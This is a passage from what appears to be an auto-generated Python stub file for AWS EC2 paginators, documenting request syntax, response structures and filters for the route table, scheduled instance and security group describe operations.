* ``product-description`` - The Reserved Instance product platform description. Instances that include ``(Amazon VPC)`` in the product platform description will only be displayed to EC2-Classic account holders and are for use with Amazon VPC. (``Linux/UNIX`` | ``Linux/UNIX (Amazon VPC)`` | ``SUSE Linux`` | ``SUSE Linux (Amazon VPC)`` | ``Red Hat Enterprise Linux`` | ``Red Hat Enterprise Linux (Amazon VPC)`` | ``Windows`` | ``Windows (Amazon VPC)`` | ``Windows with SQL Server Standard`` | ``Windows with SQL Server Standard (Amazon VPC)`` | ``Windows with SQL Server Web`` | ``Windows with SQL Server Web (Amazon VPC)`` | ``Windows with SQL Server Enterprise`` | ``Windows with SQL Server Enterprise (Amazon VPC)`` )
* ``reserved-instances-offering-id`` - The Reserved Instances offering ID.
* ``scope`` - The scope of the Reserved Instance (``Availability Zone`` or ``Region`` ).
* ``usage-price`` - The usage price of the Reserved Instance, per hour (for example, 0.84).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type IncludeMarketplace: boolean
:param IncludeMarketplace:
Include Reserved Instance Marketplace offerings in the response.
:type InstanceType: string
:param InstanceType:
The instance type that the reservation will cover (for example, ``m1.small`` ). For more information, see `Instance Types <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-types.html>`__ in the *Amazon Elastic Compute Cloud User Guide* .
:type MaxDuration: integer
:param MaxDuration:
The maximum duration (in seconds) to filter when searching for offerings.
Default: 94608000 (3 years)
:type MaxInstanceCount: integer
:param MaxInstanceCount:
The maximum number of instances to filter when searching for offerings.
Default: 20
:type MinDuration: integer
:param MinDuration:
The minimum duration (in seconds) to filter when searching for offerings.
Default: 2592000 (1 month)
:type OfferingClass: string
:param OfferingClass:
The offering class of the Reserved Instance. Can be ``standard`` or ``convertible`` .
:type ProductDescription: string
:param ProductDescription:
The Reserved Instance product platform description. Instances that include ``(Amazon VPC)`` in the description are for use with Amazon VPC.
:type ReservedInstancesOfferingIds: list
:param ReservedInstancesOfferingIds:
One or more Reserved Instances offering IDs.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type InstanceTenancy: string
:param InstanceTenancy:
The tenancy of the instances covered by the reservation. A Reserved Instance with a tenancy of ``dedicated`` is applied to instances that run in a VPC on single-tenant hardware (i.e., Dedicated Instances).
**Important:** The ``host`` value cannot be used with this parameter. Use the ``default`` or ``dedicated`` values only.
Default: ``default``
:type OfferingType: string
:param OfferingType:
The Reserved Instance offering type. If you are using tools that predate the 2011-11-01 API version, you only have access to the ``Medium Utilization`` Reserved Instance offering type.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeRouteTables(Paginator):
def paginate(self, Filters: List = None, DryRun: bool = None, RouteTableIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_route_tables`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeRouteTables>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
RouteTableIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'RouteTables': [
{
'Associations': [
{
'Main': True|False,
'RouteTableAssociationId': 'string',
'RouteTableId': 'string',
'SubnetId': 'string'
},
],
'PropagatingVgws': [
{
'GatewayId': 'string'
},
],
'RouteTableId': 'string',
'Routes': [
{
'DestinationCidrBlock': 'string',
'DestinationIpv6CidrBlock': 'string',
'DestinationPrefixListId': 'string',
'EgressOnlyInternetGatewayId': 'string',
'GatewayId': 'string',
'InstanceId': 'string',
'InstanceOwnerId': 'string',
'NatGatewayId': 'string',
'TransitGatewayId': 'string',
'NetworkInterfaceId': 'string',
'Origin': 'CreateRouteTable'|'CreateRoute'|'EnableVgwRoutePropagation',
'State': 'active'|'blackhole',
'VpcPeeringConnectionId': 'string'
},
],
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'VpcId': 'string',
'OwnerId': 'string'
},
],
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeRouteTables.
- **RouteTables** *(list) --*
Information about one or more route tables.
- *(dict) --*
Describes a route table.
- **Associations** *(list) --*
The associations between the route table and one or more subnets.
- *(dict) --*
Describes an association between a route table and a subnet.
- **Main** *(boolean) --*
Indicates whether this is the main route table.
- **RouteTableAssociationId** *(string) --*
The ID of the association between a route table and a subnet.
- **RouteTableId** *(string) --*
The ID of the route table.
- **SubnetId** *(string) --*
The ID of the subnet. A subnet ID is not returned for an implicit association.
- **PropagatingVgws** *(list) --*
Any virtual private gateway (VGW) propagating routes.
- *(dict) --*
Describes a virtual private gateway propagating route.
- **GatewayId** *(string) --*
The ID of the virtual private gateway.
- **RouteTableId** *(string) --*
The ID of the route table.
- **Routes** *(list) --*
The routes in the route table.
- *(dict) --*
Describes a route in a route table.
- **DestinationCidrBlock** *(string) --*
The IPv4 CIDR block used for the destination match.
- **DestinationIpv6CidrBlock** *(string) --*
The IPv6 CIDR block used for the destination match.
- **DestinationPrefixListId** *(string) --*
The prefix of the AWS service.
- **EgressOnlyInternetGatewayId** *(string) --*
The ID of the egress-only internet gateway.
- **GatewayId** *(string) --*
The ID of a gateway attached to your VPC.
- **InstanceId** *(string) --*
The ID of a NAT instance in your VPC.
- **InstanceOwnerId** *(string) --*
The AWS account ID of the owner of the instance.
- **NatGatewayId** *(string) --*
The ID of a NAT gateway.
- **TransitGatewayId** *(string) --*
The ID of a transit gateway.
- **NetworkInterfaceId** *(string) --*
The ID of the network interface.
- **Origin** *(string) --*
Describes how the route was created.
* ``CreateRouteTable`` - The route was automatically created when the route table was created.
* ``CreateRoute`` - The route was manually added to the route table.
* ``EnableVgwRoutePropagation`` - The route was propagated by route propagation.
- **State** *(string) --*
The state of the route. The ``blackhole`` state indicates that the route's target isn't available (for example, the specified gateway isn't attached to the VPC, or the specified NAT instance has been terminated).
- **VpcPeeringConnectionId** *(string) --*
The ID of a VPC peering connection.
- **Tags** *(list) --*
Any tags assigned to the route table.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **VpcId** *(string) --*
The ID of the VPC.
- **OwnerId** *(string) --*
The ID of the AWS account that owns the route table.
:type Filters: list
:param Filters:
One or more filters.
* ``association.route-table-association-id`` - The ID of an association ID for the route table.
* ``association.route-table-id`` - The ID of the route table involved in the association.
* ``association.subnet-id`` - The ID of the subnet involved in the association.
* ``association.main`` - Indicates whether the route table is the main route table for the VPC (``true`` | ``false`` ). Route tables that do not have an association ID are not returned in the response.
* ``owner-id`` - The ID of the AWS account that owns the route table.
* ``route-table-id`` - The ID of the route table.
* ``route.destination-cidr-block`` - The IPv4 CIDR range specified in a route in the table.
* ``route.destination-ipv6-cidr-block`` - The IPv6 CIDR range specified in a route in the route table.
* ``route.destination-prefix-list-id`` - The ID (prefix) of the AWS service specified in a route in the table.
* ``route.egress-only-internet-gateway-id`` - The ID of an egress-only Internet gateway specified in a route in the route table.
* ``route.gateway-id`` - The ID of a gateway specified in a route in the table.
* ``route.instance-id`` - The ID of an instance specified in a route in the table.
* ``route.nat-gateway-id`` - The ID of a NAT gateway.
* ``route.transit-gateway-id`` - The ID of a transit gateway.
* ``route.origin`` - Describes how the route was created. ``CreateRouteTable`` indicates that the route was automatically created when the route table was created; ``CreateRoute`` indicates that the route was manually added to the route table; ``EnableVgwRoutePropagation`` indicates that the route was propagated by route propagation.
* ``route.state`` - The state of a route in the route table (``active`` | ``blackhole`` ). The blackhole state indicates that the route\'s target isn\'t available (for example, the specified gateway isn\'t attached to the VPC, the specified NAT instance has been terminated, and so on).
* ``route.vpc-peering-connection-id`` - The ID of a VPC peering connection specified in a route in the table.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``transit-gateway-id`` - The ID of a transit gateway.
* ``vpc-id`` - The ID of the VPC for the route table.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type RouteTableIds: list
:param RouteTableIds:
One or more route table IDs.
Default: Describes all your route tables.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeScheduledInstanceAvailability(Paginator):
def paginate(self, FirstSlotStartTimeRange: Dict, Recurrence: Dict, DryRun: bool = None, Filters: List = None, MaxSlotDurationInHours: int = None, MinSlotDurationInHours: int = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_scheduled_instance_availability`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeScheduledInstanceAvailability>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
FirstSlotStartTimeRange={
'EarliestTime': datetime(2015, 1, 1),
'LatestTime': datetime(2015, 1, 1)
},
MaxSlotDurationInHours=123,
MinSlotDurationInHours=123,
Recurrence={
'Frequency': 'string',
'Interval': 123,
'OccurrenceDays': [
123,
],
'OccurrenceRelativeToEnd': True|False,
'OccurrenceUnit': 'string'
},
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ScheduledInstanceAvailabilitySet': [
{
'AvailabilityZone': 'string',
'AvailableInstanceCount': 123,
'FirstSlotStartTime': datetime(2015, 1, 1),
'HourlyPrice': 'string',
'InstanceType': 'string',
'MaxTermDurationInDays': 123,
'MinTermDurationInDays': 123,
'NetworkPlatform': 'string',
'Platform': 'string',
'PurchaseToken': 'string',
'Recurrence': {
'Frequency': 'string',
'Interval': 123,
'OccurrenceDaySet': [
123,
],
'OccurrenceRelativeToEnd': True|False,
'OccurrenceUnit': 'string'
},
'SlotDurationInHours': 123,
'TotalScheduledInstanceHours': 123
},
]
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeScheduledInstanceAvailability.
- **ScheduledInstanceAvailabilitySet** *(list) --*
Information about the available Scheduled Instances.
- *(dict) --*
Describes a schedule that is available for your Scheduled Instances.
- **AvailabilityZone** *(string) --*
The Availability Zone.
- **AvailableInstanceCount** *(integer) --*
The number of available instances.
- **FirstSlotStartTime** *(datetime) --*
The time period for the first schedule to start.
- **HourlyPrice** *(string) --*
The hourly price for a single instance.
- **InstanceType** *(string) --*
The instance type. You can specify one of the C3, C4, M4, or R3 instance types.
- **MaxTermDurationInDays** *(integer) --*
The maximum term. The only possible value is 365 days.
- **MinTermDurationInDays** *(integer) --*
The minimum term. The only possible value is 365 days.
- **NetworkPlatform** *(string) --*
The network platform (``EC2-Classic`` or ``EC2-VPC`` ).
- **Platform** *(string) --*
The platform (``Linux/UNIX`` or ``Windows`` ).
- **PurchaseToken** *(string) --*
The purchase token. This token expires in two hours.
- **Recurrence** *(dict) --*
The schedule recurrence.
- **Frequency** *(string) --*
The frequency (``Daily`` , ``Weekly`` , or ``Monthly`` ).
- **Interval** *(integer) --*
The interval quantity. The interval unit depends on the value of ``frequency`` . For example, every 2 weeks or every 2 months.
- **OccurrenceDaySet** *(list) --*
The days. For a monthly schedule, this is one or more days of the month (1-31). For a weekly schedule, this is one or more days of the week (1-7, where 1 is Sunday).
- *(integer) --*
- **OccurrenceRelativeToEnd** *(boolean) --*
Indicates whether the occurrence is relative to the end of the specified week or month.
- **OccurrenceUnit** *(string) --*
The unit for ``occurrenceDaySet`` (``DayOfWeek`` or ``DayOfMonth`` ).
- **SlotDurationInHours** *(integer) --*
The number of hours in the schedule.
- **TotalScheduledInstanceHours** *(integer) --*
The total number of hours for a single instance for the entire term.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type Filters: list
:param Filters:
The filters.
* ``availability-zone`` - The Availability Zone (for example, ``us-west-2a`` ).
* ``instance-type`` - The instance type (for example, ``c4.large`` ).
* ``network-platform`` - The network platform (``EC2-Classic`` or ``EC2-VPC`` ).
* ``platform`` - The platform (``Linux/UNIX`` or ``Windows`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type FirstSlotStartTimeRange: dict
:param FirstSlotStartTimeRange: **[REQUIRED]**
The time period for the first schedule to start.
- **EarliestTime** *(datetime) --* **[REQUIRED]**
The earliest date and time, in UTC, for the Scheduled Instance to start.
- **LatestTime** *(datetime) --* **[REQUIRED]**
The latest date and time, in UTC, for the Scheduled Instance to start. This value must be later than or equal to the earliest date and at most three months in the future.
:type MaxSlotDurationInHours: integer
:param MaxSlotDurationInHours:
The maximum available duration, in hours. This value must be greater than ``MinSlotDurationInHours`` and less than 1,720.
:type MinSlotDurationInHours: integer
:param MinSlotDurationInHours:
The minimum available duration, in hours. The minimum required duration is 1,200 hours per year. For example, the minimum daily schedule is 4 hours, the minimum weekly schedule is 24 hours, and the minimum monthly schedule is 100 hours.
:type Recurrence: dict
:param Recurrence: **[REQUIRED]**
The schedule recurrence.
- **Frequency** *(string) --*
The frequency (``Daily`` , ``Weekly`` , or ``Monthly`` ).
- **Interval** *(integer) --*
The interval quantity. The interval unit depends on the value of ``Frequency`` . For example, every 2 weeks or every 2 months.
- **OccurrenceDays** *(list) --*
The days. For a monthly schedule, this is one or more days of the month (1-31). For a weekly schedule, this is one or more days of the week (1-7, where 1 is Sunday). You can\'t specify this value with a daily schedule. If the occurrence is relative to the end of the month, you can specify only a single day.
- *(integer) --*
- **OccurrenceRelativeToEnd** *(boolean) --*
Indicates whether the occurrence is relative to the end of the specified week or month. You can\'t specify this value with a daily schedule.
- **OccurrenceUnit** *(string) --*
The unit for ``OccurrenceDays`` (``DayOfWeek`` or ``DayOfMonth`` ). This value is required for a monthly schedule. You can\'t specify ``DayOfWeek`` with a weekly schedule. You can\'t specify this value with a daily schedule.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeScheduledInstances(Paginator):
def paginate(self, DryRun: bool = None, Filters: List = None, ScheduledInstanceIds: List = None, SlotStartTimeRange: Dict = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_scheduled_instances`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeScheduledInstances>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
ScheduledInstanceIds=[
'string',
],
SlotStartTimeRange={
'EarliestTime': datetime(2015, 1, 1),
'LatestTime': datetime(2015, 1, 1)
},
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ScheduledInstanceSet': [
{
'AvailabilityZone': 'string',
'CreateDate': datetime(2015, 1, 1),
'HourlyPrice': 'string',
'InstanceCount': 123,
'InstanceType': 'string',
'NetworkPlatform': 'string',
'NextSlotStartTime': datetime(2015, 1, 1),
'Platform': 'string',
'PreviousSlotEndTime': datetime(2015, 1, 1),
'Recurrence': {
'Frequency': 'string',
'Interval': 123,
'OccurrenceDaySet': [
123,
],
'OccurrenceRelativeToEnd': True|False,
'OccurrenceUnit': 'string'
},
'ScheduledInstanceId': 'string',
'SlotDurationInHours': 123,
'TermEndDate': datetime(2015, 1, 1),
'TermStartDate': datetime(2015, 1, 1),
'TotalScheduledInstanceHours': 123
},
]
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeScheduledInstances.
- **ScheduledInstanceSet** *(list) --*
Information about the Scheduled Instances.
- *(dict) --*
Describes a Scheduled Instance.
- **AvailabilityZone** *(string) --*
The Availability Zone.
- **CreateDate** *(datetime) --*
The date when the Scheduled Instance was purchased.
- **HourlyPrice** *(string) --*
The hourly price for a single instance.
- **InstanceCount** *(integer) --*
The number of instances.
- **InstanceType** *(string) --*
The instance type.
- **NetworkPlatform** *(string) --*
The network platform (``EC2-Classic`` or ``EC2-VPC`` ).
- **NextSlotStartTime** *(datetime) --*
The time for the next schedule to start.
- **Platform** *(string) --*
The platform (``Linux/UNIX`` or ``Windows`` ).
- **PreviousSlotEndTime** *(datetime) --*
The time that the previous schedule ended or will end.
- **Recurrence** *(dict) --*
The schedule recurrence.
- **Frequency** *(string) --*
The frequency (``Daily`` , ``Weekly`` , or ``Monthly`` ).
- **Interval** *(integer) --*
The interval quantity. The interval unit depends on the value of ``frequency`` . For example, every 2 weeks or every 2 months.
- **OccurrenceDaySet** *(list) --*
The days. For a monthly schedule, this is one or more days of the month (1-31). For a weekly schedule, this is one or more days of the week (1-7, where 1 is Sunday).
- *(integer) --*
- **OccurrenceRelativeToEnd** *(boolean) --*
Indicates whether the occurrence is relative to the end of the specified week or month.
- **OccurrenceUnit** *(string) --*
The unit for ``occurrenceDaySet`` (``DayOfWeek`` or ``DayOfMonth`` ).
- **ScheduledInstanceId** *(string) --*
The Scheduled Instance ID.
- **SlotDurationInHours** *(integer) --*
The number of hours in the schedule.
- **TermEndDate** *(datetime) --*
The end date for the Scheduled Instance.
- **TermStartDate** *(datetime) --*
The start date for the Scheduled Instance.
- **TotalScheduledInstanceHours** *(integer) --*
The total number of hours for a single instance for the entire term.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type Filters: list
:param Filters:
The filters.
* ``availability-zone`` - The Availability Zone (for example, ``us-west-2a`` ).
* ``instance-type`` - The instance type (for example, ``c4.large`` ).
* ``network-platform`` - The network platform (``EC2-Classic`` or ``EC2-VPC`` ).
* ``platform`` - The platform (``Linux/UNIX`` or ``Windows`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type ScheduledInstanceIds: list
:param ScheduledInstanceIds:
The Scheduled Instance IDs.
- *(string) --*
:type SlotStartTimeRange: dict
:param SlotStartTimeRange:
The time period for the first schedule to start.
- **EarliestTime** *(datetime) --*
The earliest date and time, in UTC, for the Scheduled Instance to start.
- **LatestTime** *(datetime) --*
The latest date and time, in UTC, for the Scheduled Instance to start.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeSecurityGroups(Paginator):
def paginate(self, Filters: List = None, GroupIds: List = None, GroupNames: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_security_groups`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSecurityGroups>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
GroupIds=[
'string',
],
GroupNames=[
'string',
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'SecurityGroups': [
{
'Description': 'string',
'GroupName': 'string',
'IpPermissions': [
{
'FromPort': 123,
'IpProtocol': 'string',
'IpRanges': [
{
'CidrIp': 'string',
'Description': 'string'
},
],
'Ipv6Ranges': [
{
'CidrIpv6': 'string',
'Description': 'string'
},
],
'PrefixListIds': [
{
'Description': 'string',
'PrefixListId': 'string'
},
],
'ToPort': 123,
'UserIdGroupPairs': [
{
'Description': 'string',
'GroupId': 'string',
'GroupName': 'string',
'PeeringStatus': 'string',
'UserId': 'string',
'VpcId': 'string',
'VpcPeeringConnectionId': 'string'
},
]
},
],
'OwnerId': 'string',
'GroupId': 'string',
'IpPermissionsEgress': [
{
'FromPort': 123,
'IpProtocol': 'string',
'IpRanges': [
{
'CidrIp': 'string',
'Description': 'string'
},
],
'Ipv6Ranges': [
{
'CidrIpv6': 'string',
'Description': 'string'
},
],
'PrefixListIds': [
{
'Description': 'string',
'PrefixListId': 'string'
},
],
'ToPort': 123,
'UserIdGroupPairs': [
{
'Description': 'string',
'GroupId': 'string',
'GroupName': 'string',
'PeeringStatus': 'string',
'UserId': 'string',
'VpcId': 'string',
'VpcPeeringConnectionId': 'string'
},
]
},
],
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'VpcId': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **SecurityGroups** *(list) --*
Information about the security groups.
- *(dict) --*
Describes a security group
- **Description** *(string) --*
A description of the security group.
- **GroupName** *(string) --*
The name of the security group.
- **IpPermissions** *(list) --*
The inbound rules associated with the security group.
- *(dict) --*
Describes a set of permissions for a security group rule.
- **FromPort** *(integer) --*
The start of port range for the TCP and UDP protocols, or an ICMP/ICMPv6 type number. A value of ``-1`` indicates all ICMP/ICMPv6 types. If you specify all ICMP/ICMPv6 types, you must specify all codes.
- **IpProtocol** *(string) --*
The IP protocol name (``tcp`` , ``udp`` , ``icmp`` , ``icmpv6`` ) or number (see `Protocol Numbers <http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml>`__ ).
[VPC only] Use ``-1`` to specify all protocols. When authorizing security group rules, specifying ``-1`` or a protocol number other than ``tcp`` , ``udp`` , ``icmp`` , or ``icmpv6`` allows traffic on all ports, regardless of any port range you specify. For ``tcp`` , ``udp`` , and ``icmp`` , you must specify a port range. For ``icmpv6`` , the port range is optional; if you omit the port range, traffic for all types and codes is allowed.
- **IpRanges** *(list) --*
The IPv4 ranges.
- *(dict) --*
Describes an IPv4 range.
- **CidrIp** *(string) --*
The IPv4 CIDR range. You can either specify a CIDR range or a source security group, not both. To specify a single IPv4 address, use the /32 prefix length.
- **Description** *(string) --*
A description for the security group rule that references this IPv4 address range.
Constraints: Up to 255 characters in length. Allowed characters are a-z, A-Z, 0-9, spaces, and ._-:/()#,@[]+=;{}!$*
- **Ipv6Ranges** *(list) --*
[VPC only] The IPv6 ranges.
- *(dict) --*
[EC2-VPC only] Describes an IPv6 range.
- **CidrIpv6** *(string) --*
The IPv6 CIDR range. You can either specify a CIDR range or a source security group, not both. To specify a single IPv6 address, use the /128 prefix length.
- **Description** *(string) --*
A description for the security group rule that references this IPv6 address range.
Constraints: Up to 255 characters in length. Allowed characters are a-z, A-Z, 0-9, spaces, and ._-:/()#,@[]+=;{}!$*
- **PrefixListIds** *(list) --*
[VPC only] The prefix list IDs for an AWS service. With outbound rules, this is the AWS service to access through a VPC endpoint from instances associated with the security group.
- *(dict) --*
Describes a prefix list ID.
- **Description** *(string) --*
A description for the security group rule that references this prefix list ID.
Constraints: Up to 255 characters in length. Allowed characters are a-z, A-Z, 0-9, spaces, and ._-:/()#,@[]+=;{}!$*
- **PrefixListId** *(string) --*
The ID of the prefix.
- **ToPort** *(integer) --*
The end of port range for the TCP and UDP protocols, or an ICMP/ICMPv6 code. A value of ``-1`` indicates all ICMP/ICMPv6 codes. If you specify all ICMP/ICMPv6 types, you must specify all codes.
- **UserIdGroupPairs** *(list) --*
The security group and AWS account ID pairs.
- *(dict) --*
Describes a security group and AWS account ID pair.
- **Description** *(string) --*
A description for the security group rule that references this user ID group pair.
Constraints: Up to 255 characters in length. Allowed characters are a-z, A-Z, 0-9, spaces, and ._-:/()#,@[]+=;{}!$*
- **GroupId** *(string) --*
The ID of the security group.
- **GroupName** *(string) --*
The name of the security group. In a request, use this parameter for a security group in EC2-Classic or a default VPC only. For a security group in a nondefault VPC, use the security group ID.
For a referenced security group in another VPC, this value is not returned if the referenced security group is deleted.
- **PeeringStatus** *(string) --*
The status of a VPC peering connection, if applicable.
- **UserId** *(string) --*
The ID of an AWS account.
For a referenced security group in another VPC, the account ID of the referenced security group is returned in the response. If the referenced security group is deleted, this value is not returned.
[EC2-Classic] Required when adding or removing rules that reference a security group in another AWS account.
- **VpcId** *(string) --*
The ID of the VPC for the referenced security group, if applicable.
- **VpcPeeringConnectionId** *(string) --*
The ID of the VPC peering connection, if applicable.
- **OwnerId** *(string) --*
The AWS account ID of the owner of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **IpPermissionsEgress** *(list) --*
[VPC only] The outbound rules associated with the security group.
- *(dict) --*
Describes a set of permissions for a security group rule.
- **FromPort** *(integer) --*
The start of port range for the TCP and UDP protocols, or an ICMP/ICMPv6 type number. A value of ``-1`` indicates all ICMP/ICMPv6 types. If you specify all ICMP/ICMPv6 types, you must specify all codes.
- **IpProtocol** *(string) --*
The IP protocol name (``tcp`` , ``udp`` , ``icmp`` , ``icmpv6`` ) or number (see `Protocol Numbers <http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml>`__ ).
[VPC only] Use ``-1`` to specify all protocols. When authorizing security group rules, specifying ``-1`` or a protocol number other than ``tcp`` , ``udp`` , ``icmp`` , or ``icmpv6`` allows traffic on all ports, regardless of any port range you specify. For ``tcp`` , ``udp`` , and ``icmp`` , you must specify a port range. For ``icmpv6`` , the port range is optional; if you omit the port range, traffic for all types and codes is allowed.
- **IpRanges** *(list) --*
The IPv4 ranges.
- *(dict) --*
Describes an IPv4 range.
- **CidrIp** *(string) --*
The IPv4 CIDR range. You can either specify a CIDR range or a source security group, not both. To specify a single IPv4 address, use the /32 prefix length.
- **Description** *(string) --*
A description for the security group rule that references this IPv4 address range.
Constraints: Up to 255 characters in length. Allowed characters are a-z, A-Z, 0-9, spaces, and ._-:/()#,@[]+=;{}!$*
- **Ipv6Ranges** *(list) --*
[VPC only] The IPv6 ranges.
- *(dict) --*
[EC2-VPC only] Describes an IPv6 range.
- **CidrIpv6** *(string) --*
The IPv6 CIDR range. You can either specify a CIDR range or a source security group, not both. To specify a single IPv6 address, use the /128 prefix length.
- **Description** *(string) --*
A description for the security group rule that references this IPv6 address range.
Constraints: Up to 255 characters in length. Allowed characters are a-z, A-Z, 0-9, spaces, and ._-:/()#,@[]+=;{}!$*
